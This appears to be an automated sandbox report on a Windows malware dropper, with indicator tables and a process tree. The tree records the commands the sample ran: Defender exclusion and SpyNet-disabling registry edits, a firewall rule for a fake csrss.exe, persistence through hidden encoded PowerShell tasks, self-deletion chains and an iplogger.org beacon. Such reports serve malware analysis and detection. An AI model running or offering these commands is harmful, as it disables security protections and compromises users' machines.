| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
"C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
"C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"
C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
"C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"
C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
"C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
"C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"
C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
"C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
"C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
"C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
"C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"
C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
"C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
"C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -?
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 1216
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe
"C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 452
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 1216
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 764
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
"C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 1216
C:\Users\Admin\AppData\Local\Temp\M52CB.exe
"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 772
C:\Users\Admin\AppData\Local\Temp\M52CB.exe
"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 816
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 824
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 1216
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 956
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1016
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 2284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556
C:\Users\Admin\AppData\Local\Temp\EH46E.exe
"C:\Users\Admin\AppData\Local\Temp\EH46E.exe"
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe
https://iplogger.org/1x5az7
C:\Windows\SysWOW64\taskkill.exe
taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 1216
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
C:\ProgramData\50543188494393494002.exe
"C:\ProgramData\50543188494393494002.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 3244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1928
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
"C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 5800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1108
C:\Windows\SysWOW64\taskkill.exe
taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe
"C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"
C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
"C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"
C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
"C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"
C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe
"C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"
C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe
"C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -?
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe
"C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H
C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe
.\Install.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe
.\Install.exe /S /site_id "525403"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 3608
C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 5436
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5436 -s 708
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 3608
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 5512
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 3608
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHbFtyKwQ"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
